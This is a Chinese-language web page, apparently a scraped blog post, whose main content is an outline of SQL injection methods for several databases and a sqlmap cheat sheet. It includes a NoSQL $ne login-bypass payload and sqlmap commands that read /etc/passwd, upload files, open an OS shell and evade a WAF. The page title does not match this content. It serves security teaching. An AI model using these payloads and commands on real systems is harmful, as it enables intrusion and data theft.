当前位置：首页 > wzjs >正文

建设网站过程视频好看的网站分享

wzjs 2025/9/15 18:20:25

建设网站过程视频,好看的网站分享,粉红色网站asp,好模版网站通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2 数据库类型 ACCESS 特性没数据库用户没数据库权限没数据库查询参数没有高权限注入说法暴力猜解，借助字典得到数据注入方式联合注入偏移注入表名列名猜解不到偏移注入 MySQL 低权限常…

通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
- 数据库类型
  - ACCESS
    - 特性
      - 没数据库用户
      - 没数据库权限
      - 没数据库查询参数
      - 没有高权限注入说法
    - 暴力猜解，借助字典得到数据
    - 注入方式
      - 联合注入
      - 偏移注入
    - 表名列名猜解不到
      - 偏移注入
  - MySQL
    - 低权限
      - 常规注入
    - 高权限
      - 常规注入
      - 文件读取
        load_file
      - 文件写入
        into outfile
    - 权限原因&判断
      - 代码连接用户决定
      - 查询函数user（）
      - 其他
        database()
        
        version()
        
        @@version_compile_os
  - MSSQL
    - 低权限
      - 常规注入
    - 高权限
      - 常规注入
      - 文件读取
      - 文件读写
      - 命令执行
      - 注册表读取
    - 权限原因&判断
      - 代码连接用户决定
      - 查询函数-user()
      - 其他
        db_name() 当前数据库名字
        
        @@version 获取版本信息
        
        @@SERVERNAME 获取服务器主机信息
  - postgreSQL
    - 低权限
      - 常规注入
    - 高权限
      - 参考：https://www.freebuf.com/sectool/2493721.html
      - 常规注入
      - 文件读取
      - 文件写入
    - 权限原因&判断
      - 代码连接用户决定
      - 查询函数current_user
      - 其他
        version()
        
        current_database()
  - db2
    - 特性：
      - 数据库结构复杂，表名和列名通常需要猜解。
      - 高权限用户可以通过 LOAD 和 CALL 执行系统命令。
    - 注入方式：
      - 联合注入：通过 UNION SELECT 获取数据。
      - 报错注入：通过 XMLQUERY 等函数触发报错。
    - 权限判断：
      - 使用 SELECT user FROM sysibm.sysdummy1 查询当前用户。
      - 使用 SELECT * FROM sysibm.sysversions 查询数据库版本。
  - sybase
    - Sybase 的基本特点
      - 支持标准的 SQL 语法。
      - 支持存储过程、触发器等高级功能。
      - 数据库结构包括数据库、表、视图、存储过程等。
    - 2. Sybase 的权限模型
      - 高权限用户（如 sa）可以执行系统命令、读写文件等操作。
      - 低权限用户只能访问特定的数据库对象。
      - Sybase 的权限分为数据库用户和角色。
  - oracle
    - 特性：
      - 数据库结构复杂，表名和列名通常需要猜解。
      - 高权限用户可以通过 UTL_FILE 读写文件。
    - 注入方式：
      - 联合注入：通过 UNION SELECT 获取数据。
      - 报错注入：通过 ctxsys.drithsx.sn 等函数触发报错。
    - 权限判断：
      - 使用 SELECT user FROM dual 查询当前用户。
      - 使用 SELECT * FROM v$version 查询数据库版本。
  - mangodb
    - 特性：
      - NoSQL 数据库，不支持传统 SQL 注入。
      - 可能存在 NoSQL 注入漏洞，通常通过 JSON 查询注入。
    - 注入方式：
      - 通过修改 JSON 查询条件，绕过身份验证或获取数据。
      - { "username": {"$ne": ""}, "password": {"$ne": ""} }
- 注入神器
  - SQLMAP
    - 文档介绍 | sqlmap 用户手册
    - 常见参数
      - 1. 指定目标
        --data：指定 POST 请求的数据。
        sqlmap -u "http://example.com/login" --data="username=admin&password=123"
        
        --cookie：指定 Cookie。
        sqlmap -u "http://example.com/page?id=1" --cookie="sessionid=12345"
        
        -u 或 --url：指定目标 URL。
        sqlmap -u "http://example.com/page?id=1"
      - 2. 指定注入点
        --skip：跳过某些参数的测试。
        sqlmap -u "http://example.com/page?id=1&name=test" --skip="name"
        
        -p：指定需要测试的参数。
        sqlmap -u "http://example.com/page?id=1&name=test" -p "id"
      - 3. 指定数据库类型
        --dbms：指定目标数据库类型（如 MySQL、Oracle、PostgreSQL 等）。
        sqlmap -u "http://example.com/page?id=1" --dbms=MySQL
      - 4. 获取数据库信息
        --current-db：获取当前数据库名称。
        sqlmap -u "http://example.com/page?id=1" --current-db
        
        --tables：枚举指定数据库的表。
        sqlmap -u "http://example.com/page?id=1" -D database_name --tables
        
        --dbs：枚举所有数据库。
        sqlmap -u "http://example.com/page?id=1" --dbs
        
        --columns：枚举指定表的列。
        sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns
        
        --dump：导出表数据。
        sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
      - 5. 高级功能
        --risk：设置风险等级（1-3，默认 1），风险越高，测试越激进。
        sqlmap -u "http://example.com/page?id=1" --risk=2
        
        --threads：设置并发线程数。
        sqlmap -u "http://example.com/page?id=1" --threads=5
        
        --batch：自动选择默认选项，无需用户交互。
        sqlmap -u "http://example.com/page?id=1" --batch
        
        --level：设置测试等级（1-5，默认 1），等级越高，测试越全面。
        sqlmap -u "http://example.com/page?id=1" --level=3
      - 6. 文件加载
        -l：从日志文件中加载目标。
        sqlmap -l logfile.txt
        
        -r：从文件中加载 HTTP 请求。
        sqlmap -r request.txt
      - 7. 绕过 WAF/IDS
        --tamper：使用脚本绕过 WAF（Web 应用防火墙）或 IDS（入侵检测系统）。
        sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
      - 8. 其他常用参数
        --sql-shell：获取 SQL 交互式 shell。
        sqlmap -u "http://example.com/page?id=1" --sql-shell
        
        --file-read：读取服务器上的文件。
        sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
        
        --file-write 和 --file-dest：上传文件到服务器。
        sqlmap -u "http://example.com/page?id=1" --file-write="local_file" --file-dest="/remote/path"
        
        --os-shell：尝试获取操作系统的 shell。
        sqlmap -u "http://example.com/page?id=1" --os-shell
      - 示例 1：检测注入点
        sqlmap -u "http://example.com/page?id=1"
      - 示例 2：枚举数据库
        sqlmap -u "http://example.com/page?id=1" --dbs
      - 示例 3：导出表数据
        sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
      - 示例 4：获取操作系统 shell
        sqlmap -u "http://example.com/page?id=1" --os-shell
      - 示例 5：绕过 WAF
        sqlmap -u "http://example.com/page?id=1" --tamper=space2comment --level=5 --risk=3